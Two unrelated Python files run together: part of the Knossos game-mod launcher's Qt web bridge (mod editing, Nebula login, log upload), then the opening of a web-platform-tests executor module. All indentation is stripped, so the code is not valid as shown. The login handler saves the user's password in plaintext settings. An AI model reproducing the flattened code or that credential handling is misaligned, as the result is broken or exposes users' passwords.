filter_ = self.tr('Executables (*.exe)')
else:
filter_ = '*'
res = QtWidgets.QFileDialog.getOpenFileNames(None, self.tr('Please select one or more executables'),
folder, filter_)
if not res:
return []
else:
return [os.path.relpath(item, folder) for item in res[0]]
@QtCore.Slot(str, result=list)
def findPkgExes(self, folder):
result = []
for path, dirs, files in os.walk(folder):
for fn in files:
fn = os.path.join(path, fn)
if fn.endswith('.exe'):
result.append(fn)
elif '.so' not in fn and os.stat(fn).st_mode & stat.S_IXUSR == stat.S_IXUSR:
result.append(fn)
return [os.path.relpath(item, folder) for item in result]
def _store_mod_images(self, mod, img, imlist):
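# Copy the referenced image into the mod's kn_images folder (lists are handled
# recursively) and record its file name in imlist so _clean_mod_images() can
# remove images that are no longer referenced.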
if isinstance(img, list):
for i, item in enumerate(img):
img[i] = self._store_mod_images(mod, item, imlist)
return img
path = os.path.join(mod.folder, 'kn_images')
if not os.path.isdir(path):
os.mkdir(path)
if os.path.abspath(img).startswith(path):
imlist.add(os.path.basename(img))
return img
name, ext = os.path.splitext(img)
dest = os.path.join(path, util.gen_hash(img)[1] + ext)
logging.debug('Copying image from %s to %s.', img, dest)
shutil.copyfile(img, dest)
imlist.add(os.path.basename(dest))
return dest
def _clean_mod_images(self, mod, images):
path = os.path.join(mod.folder, 'kn_images')
if not os.path.isdir(path):
return
for item in os.listdir(path):
if item not in images:
logging.debug('Removing %s from %s because it is no longer needed.', item, mod)
os.unlink(os.path.join(path, item))
@QtCore.Slot(str, result=bool)
def saveModDetails(self, data):
try:
data = json.loads(data)
except Exception:
logging.exception('Failed to decode mod details!')
QtWidgets.QMessageBox.critical(None, 'Error', self.tr('Internal data inconsistency. Please try again.'))
return False
mod = self._get_mod(data['id'], data['version'])
if mod == -1:
logging.error('Failed to find mod "%s" during save!' % data['id'])
QtWidgets.QMessageBox.critical(None, 'Error', self.tr('Failed to find the mod! Weird...'))
return False
if not mod.dev_mode:
QtWidgets.QMessageBox.critical(None, 'Knossos',
self.tr("You can't edit \"%s\" because it isn't in dev mode!") % mod.title)
return False
if mod.mtype == 'engine':
mod.stability = data['stability']
mod.title = data['title']
mod.description = data['description']
imlist = set()
for prop in ('logo', 'tile', 'banner', 'screenshots', 'attachments'):
if data[prop]:
setattr(mod, prop, self._store_mod_images(mod, data[prop], imlist))
elif isinstance(data[prop], list):
setattr(mod, prop, [])
else:
setattr(mod, prop, None)
self._clean_mod_images(mod, imlist)
mod.release_thread = data['release_thread']
mod.videos = []
for line in data['video_urls'].split('\n'):
line = line.strip()
if line != '':
mod.videos.append(line)
if data['first_release']:
try:
mod.first_release = datetime.strptime(data['first_release'], '%Y-%m-%d')
except ValueError:
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr('The entered first release date is invalid!'))
return False
if data['last_update']:
try:
mod.last_update = datetime.strptime(data['last_update'], '%Y-%m-%d')
except ValueError:
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr('The entered last update date is invalid!'))
return False
try:
mod.save()
except Exception:
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr('Failed to save mod.json!'))
return False
center.main_win.update_mod_list()
return True
@QtCore.Slot(str, str, str, str, result=bool)
def savePackage(self, mid, version, pkg_name, data):
try:
data = json.loads(data)
except Exception:
logging.exception('Failed to decode mod details!')
QtWidgets.QMessageBox.critical(None, 'Error', self.tr('Internal data inconsistency. Please try again.'))
return False
mod = self._get_mod(mid, version)
if mod == -1:
logging.error('Failed to find mod "%s" during save!' % mid)
QtWidgets.QMessageBox.critical(None, 'Error', self.tr('Failed to find the mod! Weird...'))
return False
if not mod.dev_mode:
QtWidgets.QMessageBox.critical(None, 'Knossos',
self.tr("You can't edit \"%s\" because it isn't in dev mode!") % mod.title)
return False
pkg = None
for item in mod.packages:
if item.name == pkg_name:
pkg = item
break
if not pkg:
logging.error('Failed to find package "%s" for mod "%s"!' % (pkg_name, mid))
QtWidgets.QMessageBox.critical(None, 'Error', self.tr('Failed to find the package! Weird...'))
return False
pkg.notes = data['notes']
pkg.status = data['status']
pkg.dependencies = data['dependencies']
if mod.mtype in ('engine', 'tool'):
pkg.is_vp = False
pkg.environment = data['environment']
pkg.executables = data['executables']
else:
pkg.is_vp = data['is_vp']
pkg.environment = None
pkg.executables = []
# Normalize
pkg.set(pkg.get())
mod.update_mod_flag()
try:
mod.save()
except Exception:
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr('Failed to save mod.json!'))
return False
center.main_win.update_mod_list()
return True
@QtCore.Slot(str, str, str, str, result=bool)
def saveModFsoDetails(self, mid, version, build, cmdline):
mod = self._get_mod(mid, version)
if mod == -1:
logging.error('Failed to find mod "%s" during save!' % mid)
QtWidgets.QMessageBox.critical(None, 'Error', self.tr('Failed to find the mod! Weird...'))
return False
if not mod.dev_mode:
QtWidgets.QMessageBox.critical(None, 'Knossos',
self.tr("You can't edit \"%s\" because it isn't in dev mode!") % mod.title)
return False
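# The build string is either '<engine mod id>#<version>' or 'custom#<path to the executable>'.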
build = build.split('#')
if len(build) != 2:
logging.error('saveModFsoDetails(): build is not correctly formatted! (%s)' % build)
else:
if build[0] == 'custom':
mod.custom_build = build[1]
else:
mod.custom_build = None
try:
exes = mod.get_executables()
except repo.NoExecutablesFound:
# Remove all dependencies on engines first to make sure that we don't create conflicting dependencies
for pkg in mod.packages:
for i, dep in reversed(list(enumerate(pkg.dependencies))):
try:
d = center.installed.query(dep['id'], dep['version'])
except repo.ModNotFound:
# This dependency isn't installed which shouldn't happen since it'll also cause problems
# elsewhere. However, we want to avoid removing a valid dependency just because of a user
# mistake so let's check if the dependency is still available.
try:
d = center.mods.query(dep['id'], dep['version'])
except repo.ModNotFound:
# Still not found. Assume that this dependency doesn't exist anymore and remove it to be safe.
del pkg.dependencies[i]
continue
if d.mtype == 'engine':
del pkg.dependencies[i]
done = False
for pkg in mod.packages:
if pkg.status == 'required':
pkg.dependencies.append({
'id': build[0],
'version': '>=' + build[1]
})
done = True
break
if not done:
QtWidgets.QMessageBox.critical(None, 'Error',
self.tr('Failed to save the selected FSO build. Make sure that you have at least one required' +
' package!'))
return False
else:
old_build = exes[0]['mod']
done = False
for pkg in mod.packages:
for dep in pkg.dependencies:
if dep['id'] == old_build.mid:
dep['id'] = build[0]
dep['version'] = '>=' + build[1]
done = True
break
if done:
break
if not done:
logging.error('Failed to update build dependency for "%s"! WHY?!?! (old_build = %s, new_build = %s)'
% (mod, old_build, build[0]))
mod.cmdline = cmdline
try:
mod.save()
except Exception:
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr('Failed to save mod.json!'))
return False
center.main_win.update_mod_list()
return True
@QtCore.Slot(str, str, str, str)
def saveUserFsoDetails(self, mid, version, build, cmdline):
mod = self._get_mod(mid, version)
if mod == -1:
logging.error('Failed to find mod "%s" during save!' % mid)
QtWidgets.QMessageBox.critical(None, 'Error', self.tr('Failed to find the mod! Weird...'))
return
if build == '':
mod.user_custom_build = None
mod.user_exe = None
else:
build = build.split('#')
if len(build) != 2:
logging.error('saveUserFsoDetails(): build is not correctly formatted! (%s)' % build)
else:
if build[0] == 'custom':
mod.user_custom_build = build[1]
mod.user_exe = None
else:
mod.user_custom_build = None
mod.user_exe = build
if cmdline == '#DEFAULT#':
cmdline = None
mod.user_cmdline = cmdline
try:
mod.save_user()
except Exception:
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr('Failed to save user.json!'))
return
center.main_win.update_mod_list()
@QtCore.Slot(str, str, list, result=bool)
def saveModFlag(self, mid, version, mod_flag):
mod = self._get_mod(mid, version)
if mod in (-1, -2):
return False
mod.mod_flag = mod_flag
try:
mod.save()
except Exception:
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr('Failed to save mod.json!'))
return False
center.main_win.update_mod_list()
return True
@QtCore.Slot(str, str, bool)
def startUpload(self, mid, version, private):
mod = self._get_mod(mid, version)
if mod in (-1, -2):
return
self._last_upload = tasks.run_task(tasks.UploadTask(mod, private))
@QtCore.Slot()
def cancelUpload(self):
if self._last_upload:
self._last_upload.abort()
self._last_upload = None
@QtCore.Slot(str, str, result=bool)
def nebLogin(self, user, password):
client = nebula.NebulaClient()
try:
result = client.login(user, password)
except Exception:
result = False
logging.exception('Failed to login to Nebula!')
if result:
QtWidgets.QMessageBox.information(None, 'Knossos', 'Login successful!')
# TODO: Figure out a better way for this!
center.settings['neb_user'] = user
center.settings['neb_password'] = password
center.save_settings()
return True
else:
QtWidgets.QMessageBox.critical(None, 'Knossos', 'Login failed.')
return False
@QtCore.Slot(result=bool)
def nebLogout(self):
center.settings['neb_user'] = ''
center.settings['neb_password'] = ''
center.save_settings()
return True
@QtCore.Slot(str, str, str)
def nebRegister(self, user, password, email):
client = nebula.NebulaClient()
try:
result = client.register(user, password, email)
except Exception:
result = False
logging.exception('Failed to register to the Nebula!')
if result:
QtWidgets.QMessageBox.information(None, 'Knossos',
'Registered. Please check your e-mail inbox for your confirmation mail.')
else:
QtWidgets.QMessageBox.critical(None, 'Knossos', 'Registration failed. Please contact ngld.')
@QtCore.Slot(str)
def nebResetPassword(self, user):
client = nebula.NebulaClient()
try:
result = client.reset_password(user)
except Exception:
result = False
logging.exception('Failed to reset Nebula password!')
if result:
QtWidgets.QMessageBox.information(None, 'Knossos', 'You should now receive a mail with a reset link. ' +
'Remember to check your spam folder!')
else:
QtWidgets.QMessageBox.critical(None, 'Knossos', 'Request failed. Please contact ngld.')
@QtCore.Slot(str, str, str, result=bool)
def nebReportMod(self, mid, version, message):
mod = self._get_mod(mid, version)
if mod in (-1, -2):
return False
client = nebula.NebulaClient()
try:
client.report_release(mod, message)
except Exception:
logging.exception('Failed to send mod report!')
QtWidgets.QMessageBox.critical(None, 'Knossos', 'Request failed. Please contact ngld.')
return False
else:
QtWidgets.QMessageBox.information(None, 'Knossos',
'Thanks for your report. We will act on it as soon as possible.')
return True
@QtCore.Slot(str, str)
def nebDeleteMod(self, mid, version):
mod = self._get_mod(mid, version)
if mod in (-1, -2):
return
fine = False
client = nebula.NebulaClient()
try:
client.delete_release(mod)
fine = True
except nebula.AccessDeniedException:
QtWidgets.QMessageBox.critical(None, 'Knossos', "You can't do that!")
except nebula.InvalidLoginException:
QtWidgets.QMessageBox.critical(None, 'Knossos', "You can't delete this mod from the nebula until you login.")
except nebula.RequestFailedException as exc:
if exc.args[0] == 'not found':
QtWidgets.QMessageBox.information(None, 'Knossos',
"This mod hasn't been uploaded and thus can't be removed from the nebula.")
fine = True
else:
QtWidgets.QMessageBox.critical(None, 'Knossos', 'Request failed. Please contact ngld.')
except Exception:
logging.exception('Failed to delete the release!')
QtWidgets.QMessageBox.critical(None, 'Knossos',
'Request failed. You might have problems connecting to fsnebula.org.')
else:
QtWidgets.QMessageBox.information(None, 'Knossos', 'The release was successfully deleted.')
if fine:
result = QtWidgets.QMessageBox.question(None, 'Knossos', 'Should the local files be deleted?')
if result == QtWidgets.QMessageBox.Yes:
tasks.run_task(tasks.RemoveModFolder(mod))
@QtCore.Slot(str, str)
def removeModFolder(self, mid, version):
mod = self._get_mod(mid, version)
if mod in (-1, -2):
return
tasks.run_task(tasks.RemoveModFolder(mod))
@QtCore.Slot(result=str)
def selectCustomBuild(self):
if sys.platform == 'win32':
filter_ = '*.exe'
else:
filter_ = '*'
res = QtWidgets.QFileDialog.getOpenFileNames(None, 'Please select your FSO build', None, filter_)
if res and len(res[0]) > 0:
return res[0][0]
else:
return ''
@QtCore.Slot(str, str, result=str)
def getFsoBuild(self, mid, version):
mod = self._get_mod(mid, version)
if not isinstance(mod, repo.Mod):
return ''
if mod.custom_build:
return 'custom#' + mod.custom_build
try:
for item in mod.get_executables():
if item.get('label') is None:
mod = item['mod']
return mod.mid + '#' + str(mod.version)
except repo.NoExecutablesFound:
return ''
except Exception:
logging.exception('Failed to fetch executables!')
return ''
@QtCore.Slot(str, str, result=str)
def getUserBuild(self, mid, version):
mod = self._get_mod(mid, version)
if not isinstance(mod, repo.Mod):
return ''
if mod.user_custom_build:
return 'custom#' + mod.user_custom_build
try:
for item in mod.get_executables(user=True):
if item.get('label') is None:
mod = item['mod']
return mod.mid + '#' + str(mod.version)
except repo.NoExecutablesFound:
return ''
except Exception:
logging.exception('Failed to fetch executables!')
return ''
@QtCore.Slot(str, str, int)
def getFsoCaps(self, mid, version, cb_id):
mod = None
if mid != 'custom':
mod = self._get_mod(mid, version)
if mod in (-1, -2):
return
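# Fetch the FSO flags on a worker thread so the UI stays responsive; the result
# is delivered to the JS side through the asyncCbFinished signal.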
def helper():
flags = None
exes = []
if not mod:
flags = settings.get_fso_flags(version)
else:
try:
for exe in mod.get_executables():
if not exe.get('label'):
if not flags:
flags = settings.get_fso_flags(exe['file'])
exes.append(os.path.basename(exe['file']))
except repo.NoExecutablesFound:
pass
except Exception:
logging.exception('Failed to fetch FSO flags!')
try:
self.asyncCbFinished.emit(cb_id, json.dumps({
'flags': flags,
'exes': exes
}))
except Exception:
logging.exception('Failed to encode FSO flags!')
Thread(target=helper).start()
@QtCore.Slot(str, str, str, str, result=bool)
def createModVersion(self, mid, version, dest_ver, method):
mod = self._get_mod(mid, version)
if not isinstance(mod, repo.InstalledMod):
logging.error('Mod %s (%s) should have gotten a new version but was not found!' % (mid, version))
QtWidgets.QMessageBox.critical(None, self.tr('Error'),
self.tr("Somehow I lost the mod you're talking about! I'm sorry, this is a bug."))
return False
if not mod.dev_mode:
QtWidgets.QMessageBox.critical(None, 'Knossos',
self.tr("You can't edit \"%s\" because it isn't in dev mode!") % mod.title)
return False
old_ver = semantic_version.Version(version, partial=True)
try:
dest_ver = semantic_version.Version(dest_ver, partial=True)
except ValueError:
QtWidgets.QMessageBox.critical(None, self.tr('Error'),
self.tr("The specified version number is invalid!"))
return False
except Exception:
logging.exception('Failed to parse new version (%s)!' % dest_ver)
QtWidgets.QMessageBox.critical(None, self.tr('Error'),
self.tr("Failed to parse the new version! This is a bug."))
return False
if old_ver >= dest_ver:
# TODO: Is this check too restrictive?
QtWidgets.QMessageBox.critical(None, self.tr('Error'),
self.tr("The new version has to be higher than the old version!"))
return False
new_mod = mod.copy()
new_mod.version = dest_ver
new_mod.generate_folder()
if os.path.isdir(new_mod.folder):
QtWidgets.QMessageBox.critical(None, self.tr('Error'),
self.tr("The destination folder (%s) already exists! I won't overwrite an existing folder!") % new_mod.folder)
return False
if method == 'copy':
os.mkdir(new_mod.folder)
tasks.run_task(tasks.CopyFolderTask(mod.folder, new_mod.folder))
elif method == 'rename':
try:
util.safe_rename(mod.folder, new_mod.folder)
except OSError:
logging.exception('Failed to rename mod folder for new version!')
QtWidgets.QMessageBox.critical(None, self.tr('Error'),
self.tr('Failed to rename folder "%s"! Make sure that no other program has locked it.') % mod.folder)
return False
try:
center.installed.remove_mod(mod)
except repo.ModNotFound:
logging.exception('The old mod is missing after rename! Did the copy fail?')
elif method == 'empty':
os.mkdir(new_mod.folder)
for pkg in new_mod.packages:
os.mkdir(os.path.join(new_mod.folder, pkg.folder))
try:
new_mod.save()
except Exception:
QtWidgets.QMessageBox.critical(None, 'Knossos', self.tr('Failed to save mod.json!'))
return False
center.installed.add_mod(new_mod)
center.main_win.update_mod_list()
return True
@QtCore.Slot(int, int, str)
def testVoice(self, voice, volume, text):
Thread(target=clibs.speak, args=(voice, volume, text)).start()
@QtCore.Slot(str)
def showDescEditor(self, text):
windows.DescriptionEditorWindow(text)
@QtCore.Slot(str, result=str)
def parseIniMod(self, path):
mod = repo.IniMod()
mod.load(path)
return json.dumps(mod.get())
@QtCore.Slot(str, str)
def verifyModIntegrity(self, mid, version):
mod = self._get_mod(mid, version)
if mod in (-1, -2):
return
tasks.run_task(tasks.CheckFilesTask(mod.packages, mod))
@QtCore.Slot()
def openScreenshotFolder(self):
path = os.path.join(settings.get_fso_profile_path(), 'screenshots')
if os.path.isdir(path):
QtGui.QDesktopServices.openUrl(QtCore.QUrl.fromLocalFile(path))
else:
QtWidgets.QMessageBox.critical(None, 'Knossos', "The screenshot folder doesn't exist. Try taking screenshots before clicking this button!")
@QtCore.Slot(result=str)
def getDefaultBasePath(self):
if sys.platform == 'win32':
return 'C:\\Games\\FreespaceOpen'
elif sys.platform == 'linux':
return os.path.expanduser('~/games/FreespaceOpen')
elif sys.platform == 'darwin':
return os.path.expanduser('~/Documents/Games/FreespaceOpen')
else:
return ''
@QtCore.Slot()
def openFsoDebugLog(self):
logpath = os.path.join(settings.get_fso_profile_path(), 'data/fs2_open.log')
if not os.path.isfile(logpath):
QtWidgets.QMessageBox.warning(None, 'Knossos',
'Sorry, but I can\'t find the fs2_open.log file.\nDid you run the debug build?')
return
QtGui.QDesktopServices.openUrl(QtCore.QUrl.fromLocalFile(logpath))
@QtCore.Slot(result=str)
def uploadFsoDebugLog(self):
try:
logpath = os.path.join(settings.get_fso_profile_path(), 'data/fs2_open.log')
if not os.path.isfile(logpath):
QtWidgets.QMessageBox.warning(None, 'Knossos',
'Sorry, but I can\'t find the fs2_open.log file.\nDid you run the debug build?')
return ''
st = os.stat(logpath)
if st.st_size > 5 * (1024 ** 2):
QtWidgets.QMessageBox.critical(None, 'Knossos',
"Your log is larger than 5 MB! I unfortunately can't upload logs that big.")
return ''
# Date check
changed_at = datetime.fromtimestamp(st.st_mtime)
age = datetime.now() - changed_at
message = 'The most recent log was generated '
if age.days == 0:
message += 'today'
elif age.days == 1:
message += 'yesterday'
else:
message += '%d days ago' % age.days
message += changed_at.strftime(' at %X')
message += '. Is this when you encountered a problem?'
box = QtWidgets.QMessageBox()
box.setIcon(QtWidgets.QMessageBox.Question)
box.setText(message)
box.setWindowTitle('Knossos')
box.addButton('Yes, upload', QtWidgets.QMessageBox.YesRole)
# no_again = box.addButton('No, run again and generate a new log', QtWidgets.QMessageBox.NoRole)
no_abort = box.addButton('No', QtWidgets.QMessageBox.RejectRole)
box.exec_()
if box.clickedButton() == no_abort:
return ''
client = nebula.NebulaClient()
with open(logpath, 'r') as stream:
log_link = client.upload_log(stream.read())
except nebula.InvalidLoginException:
QtWidgets.QMessageBox.critical(None, 'Knossos', 'You have to log in to upload logs!')
except Exception:
logging.exception('Log upload failed!')
QtWidgets.QMessageBox.critical(None, 'Knossos',
'The log upload failed for an unknown reason! Please make sure your internet connection is fine.')
else:
if log_link:
return log_link
else:
QtWidgets.QMessageBox.critical(None, 'Knossos', 'The log upload failed for an unknown reason!')
return ''
@QtCore.Slot()
def openKnossosLog(self):
from .launcher import log_path
if not os.path.isfile(log_path):
QtWidgets.QMessageBox.warning(None, 'Knossos',
'Sorry, but I can\'t find the Knossos log. Something went *really* wrong.')
return
QtGui.QDesktopServices.openUrl(QtCore.QUrl.fromLocalFile(log_path))
@QtCore.Slot(result=str)
def uploadKnossosLog(self):
log_link = None
try:
from .launcher import log_path
if not os.path.isfile(log_path):
QtWidgets.QMessageBox.warning(None, 'Knossos',
'Sorry, but I can\'t find the Knossos log. Something went *really* wrong.')
return ''
st = os.stat(log_path)
if st.st_size > 5 * (1024 ** 2):
QtWidgets.QMessageBox.critical(None, 'Knossos',
"Your log is larger than 5 MB! I unfortunately can't upload logs that big.")
return ''
client = nebula.NebulaClient()
with open(log_path, 'r') as stream:
log_link = client.upload_log(stream.read())
except nebula.InvalidLoginException:
QtWidgets.QMessageBox.critical(None, 'Knossos', 'You have to log in to upload logs!')
except Exception:
logging.exception('Log upload failed!')
QtWidgets.QMessageBox.critical(None, 'Knossos',
'The log upload failed for an unknown reason! Please make sure your internet connection is fine.')
else:
if log_link:
return log_link
else:
QtWidgets.QMessageBox.critical(None, 'Knossos', 'The log upload failed for an unknown reason!')
return ''
@QtCore.Slot(str, result=str)
def getGlobalFlags(self, build):
return json.dumps(center.settings['fso_flags'].get(build, {}))
@QtCore.Slot(str, str)
def saveGlobalFlags(self, build, flags):
try:
center.settings['fso_flags'][build] = json.loads(flags)
except Exception:
logging.exception('Failed to decode flags from JS!')
QtWidgets.QMessageBox.critical(None, 'Knossos', 'Failed to decode flags!')
return
center.save_settings()
QtWidgets.QMessageBox.information(None, 'Knossos', 'The settings have been successfully saved.')
@QtCore.Slot(str, str)
def applyGlobalFlagsToAll(self, flags, custom_flags):
try:
flags = json.loads(flags)
except Exception:
logging.exception('Failed to decode flags from JS!')
QtWidgets.QMessageBox.critical(None, 'Knossos', 'Failed to decode flags!')
return
engine_mods = []
for mvs in center.installed.mods.values():
if mvs[0].mtype == 'engine':
engine_mods.extend(mvs)
tasks.run_task(tasks.ApplyEngineFlagsTask(engine_mods, flags, custom_flags))
@QtCore.Slot(str, str, result=str)
def getModCmdline(self, mid, version):
mod = self._get_mod(mid, version)
if mod in (-1, -2):
return ''
try:
return ' '.join(runner.apply_global_flags(mod))
except repo.NoExecutablesFound:
return ''
@QtCore.Slot(result=str)
def getEngineBuilds(self):
builds = []
for mvs in center.installed.mods.values():
if mvs[0].mtype == 'engine':
for mod in mvs:
builds.append(mod.get())
return json.dumps(builds)
@QtCore.Slot(str, int)
def getTeamMembers(self, mid, cb_id):
def helper():
try:
client = nebula.NebulaClient()
members = client.get_team_members(mid)
except nebula.InvalidLoginException:
members = {'result': False, 'reason': 'no login'}
except Exception:
logging.exception('Failed to retrieve members!')
members = {'result': False, 'reason': 'exception'}
self.asyncCbFinished.emit(cb_id, json.dumps(members))
Thread(target=helper).start()
@QtCore.Slot(str, str, int)
def updateTeamMembers(self, mid, members, cb_id):
try:
members = json.loads(members)
except json.JSONDecodeError:
logging.exception('Failed to decode members!')
QtWidgets.QMessageBox.critical(None, 'Knossos', 'Failed to decode team members')
self.asyncCbFinished.emit(cb_id, 'false')
return
def helper():
try:
client = nebula.NebulaClient()
helper2(client.update_team_members(mid, members))
except Exception:
logging.exception('Failed to save team members!')
helper2({
'result': False,
'reason': 'exception'
})
@run_in_qt
def helper2(result):
msg = None
reason = result.get('reason', None)
if result['result']:
self.asyncCbFinished.emit(cb_id, 'true')
return
elif reason == 'owners_changed':
msg = "Your changes weren't saved because you aren't permitted to modify the mod Owners!"
elif reason == 'no_owners':
msg = "Your changes couldn't be saved because you need to specify at least one Owner!"
elif reason == 'member_not_found':
msg = 'Your changes could not be saved because the user "%s" was not found.' % result['member']
else:
msg = "Your changes couldn't be saved because an unexpected error ocurred!"
QtWidgets.QMessageBox.critical(None, 'Knossos', msg)
self.asyncCbFinished.emit(cb_id, 'false')
Thread(target=helper).start()
@QtCore.Slot(str)
def reportError(self, msg):
logging.error('JS Error: %s' % msg)
@QtCore.Slot()
def fixBuildSelection(self):
tasks.run_task(tasks.FixUserBuildSelectionTask())
@QtCore.Slot(bool)
def fixImages(self, do_devs):
tasks.run_task(tasks.FixImagesTask(do_devs))
@QtCore.Slot()
def rewriteModJson(self):
tasks.run_task(tasks.RewriteModMetadata(center.installed.get_list()))
@QtCore.Slot()
def showTempHelpPopup(self):
QtWidgets.QMessageBox.information(None, 'Knossos',
'The help system isn\'t implemented yet, but you '
'can ask for help on the <a href="https://discord.gg/qfReB8t">#knossos</a> '
'channel on Discord or on the '
'<a href="https://www.hard-light.net/forums/index.php?topic=94068.0">'
'Knossos release thread</a> on the Hard Light Productions forums.')
@QtCore.Slot(str, result=str)
def setSortType(self, sort_type):
center.sort_type = sort_type
center.main_win.update_mod_list()
return sort_type
if QtWebChannel:
BrowserCtrl = WebBridge
else:
class BrowserCtrl(object):
_view = None
_nam = None
bridge = None
def __init__(self, webView):
self._view = webView
self.bridge = WebBridge()
settings = webView.settings()
settings.setAttribute(QtWebKit.QWebSettings.DeveloperExtrasEnabled, True)
frame = webView.page().mainFrame()
frame.javaScriptWindowObjectCleared.connect(self.insert_bridge)
def load(self):
link = 'qrc:///html/index.html'
self._view.load(QtCore.QUrl(link))
def insert_bridge(self):
frame = self._view.page().mainFrame()
del self.bridge
self.bridge = WebBridge()
frame.addToJavaScriptWindowObject('fs2mod', self.bridge)
|
base.py
|
import hashlib
import httplib
import os
import threading
import traceback
import socket
import urlparse
from abc import ABCMeta, abstractmethod
from ..testrunner import Stop
from protocol import Protocol, BaseProtocolPart
here = os.path.split(__file__)[0]
# Extra timeout to use after internal test timeout at which the harness
# should force a timeout
extra_timeout = 5 # seconds
def executor_kwargs(test_type, server_config, cache_manager, **kwargs):
timeout_multiplier = kwargs["timeout_multiplier"]
if timeout_multiplier is None:
timeout_multiplier = 1
executor_kwargs = {"server_config": server_config,
"timeout_multiplier": timeout_multiplier,
"debug_info": kwargs["debug_info"]}
if test_type == "reftest":
executor_kwargs["screenshot_cache"] = cache_manager.dict()
if test_type == "wdspec":
executor_kwargs["binary"] = kwargs.get("binary")
executor_kwargs["webdriver_binary"] = kwargs.get("webdriver_binary")
executor_kwargs["webdriver_args"] = kwargs.get("webdriver_args")
return executor_kwargs
def strip_server(url):
"""Remove the scheme and netloc from a url, leaving only the path and any query
or fragment.
url - the url to strip
e.g. http://example.org:8000/tests?id=1#2 becomes /tests?id=1#2"""
url_parts = list(urlparse.urlsplit(url))
url_parts[0] = ""
url_parts[1] = ""
return urlparse.urlunsplit(url_parts)
class TestharnessResultConverter(object):
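# Maps the numeric status codes reported by testharness.js to the status strings
# used for the harness-level result and the individual subtest results.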
harness_codes = {0: "OK",
1: "ERROR",
2: "TIMEOUT"}
test_codes = {0: "PASS",
1: "FAIL",
2: "TIMEOUT",
3: "NOTRUN"}
def __call__(self, test, result):
"""Convert a JSON result into a (TestResult, [SubtestResult]) tuple"""
result_url, status, message, stack, subtest_results = result
assert result_url == test.url, ("Got results from %s, expected %s" %
(result_url, test.url))
harness_result = test.result_cls(self.harness_codes[status], message)
return (harness_result,
[test.subtest_result_cls(st_name, self.test_codes[st_status], st_message, st_stack)
for st_name, st_status, st_message, st_stack in subtest_results])
testharness_result_converter = TestharnessResultConverter()
def reftest_result_converter(self, test, result):
return (test.result_cls(result["status"], result["message"],
extra=result.get("extra")), [])
def pytest_result_converter(self, test, data):
harness_data, subtest_data = data
if subtest_data is None:
subtest_data = []
harness_result = test.result_cls(*harness_data)
subtest_results = [test.subtest_result_cls(*item) for item in subtest_data]
return (harness_result, subtest_results)
class ExecutorException(Exception):
def __init__(self, status, message):
self.status = status
self.message = message
class TestExecutor(object):
__metaclass__ = ABCMeta
test_type = None
convert_result = None
supports_testdriver = False
def __init__(self, browser, server_config, timeout_multiplier=1,
debug_info=None, **kwargs):
"""Abstract Base class for object that actually executes the tests in a
specific browser. Typically there will be a different TestExecutor
subclass for each test type and method of executing tests.
:param browser: ExecutorBrowser instance providing properties of the
browser that will be tested.
:param server_config: Dictionary of wptserve server configuration of the
form stored in TestEnvironment.config
:param timeout_multiplier: Multiplier relative to base timeout to use
when setting test timeout.
"""
self.runner = None
self.browser = browser
self.server_config = server_config
self.timeout_multiplier = timeout_multiplier
self.debug_info = debug_info
self.last_environment = {"protocol": "http",
"prefs": {}}
self.protocol = None # This must be set in subclasses
@property
def logger(self):
"""StructuredLogger for this executor"""
if self.runner is not None:
return self.runner.logger
def setup(self, runner):
"""Run steps needed before tests can be started e.g. connecting to
browser instance
:param runner: TestRunner instance that is going to run the tests"""
self.runner = runner
if self.protocol is not None:
self.protocol.setup(runner)
def teardown(self):
"""Run cleanup steps after tests have finished"""
if self.protocol is not None:
self.protocol.teardown()
def run_test(self, test):
"""Run a particular test.
:param test: The test to run"""
if test.environment != self.last_environment:
self.on_environment_change(test.environment)
try:
result = self.do_test(test)
except Exception as e:
result = self.result_from_exception(test, e)
if result is Stop:
return result
# log result of parent test
if result[0].status == "ERROR":
self.logger.debug(result[0].message)
self.last_environment = test.environment
self.runner.send_message("test_ended", test, result)
def server_url(self, protocol):
return "%s://%s:%s" % (protocol,
self.server_config["browser_host"],
self.server_config["ports"][protocol][0])
def test_url(self, test):
return urlparse.urljoin(self.server_url(test.environment["protocol"]), test.url)
@abstractmethod
def do_test(self, test):
"""Test-type and protocol specific implementation of running a
specific test.
:param test: The test to run."""
pass
def on_environment_change(self, new_environment):
pass
def result_from_exception(self, test, e):
if hasattr(e, "status") and e.status in test.result_cls.statuses:
status = e.status
else:
status = "ERROR"
message = unicode(getattr(e, "message", ""))
if message:
message += "\n"
message += traceback.format_exc(e)
return test.result_cls(status, message), []
def wait(self):
self.protocol.base.wait()
class TestharnessExecutor(TestExecutor):
convert_result = testharness_result_converter
class RefTestExecutor(TestExecutor):
convert_result = reftest_result_converter
def __init__(self, browser, server_config, timeout_multiplier=1, screenshot_cache=None,
debug_info=None, **kwargs):
TestExecutor.__init__(self, browser, server_config,
timeout_multiplier=timeout_multiplier,
debug_info=debug_info)
self.screenshot_cache = screenshot_cache
class RefTestImplementation(object):
def __init__(self, executor):
self.timeout_multiplier = executor.timeout_multiplier
self.executor = executor
# Cache of url:(screenshot hash, screenshot). Typically the
# screenshot is None, but we set this value if a test fails
# and the screenshot was taken from the cache so that we may
# retrieve the screenshot from the cache directly in the future
self.screenshot_cache = self.executor.screenshot_cache
self.message = None
def setup(self):
pass
def teardown(self):
pass
@property
def logger(self):
return self.executor.logger
def get_hash(self, test, viewport_size, dpi):
timeout = test.timeout * self.timeout_multiplier
key = (test.url, viewport_size, dpi)
if key not in self.screenshot_cache:
success, data = self.executor.screenshot(test, viewport_size, dpi)
if not success:
return False, data
screenshot = data
hash_value = hashlib.sha1(screenshot).hexdigest()
self.screenshot_cache[key] = (hash_value, None)
rv = (hash_value, screenshot)
else:
rv = self.screenshot_cache[key]
self.message.append("%s %s" % (test.url, rv[0]))
return True, rv
def is_pass(self, lhs_hash, rhs_hash, relation):
assert relation in ("==", "!=")
self.message.append("Testing %s %s %s" % (lhs_hash, relation, rhs_hash))
return ((relation == "==" and lhs_hash == rhs_hash) or
(relation == "!=" and lhs_hash != rhs_hash))
def run_test(self, test):
viewport_size = test.viewport_size
dpi = test.dpi
self.message = []
# Depth-first search of reference tree, with the goal
# of reaching a leaf node with only pass results
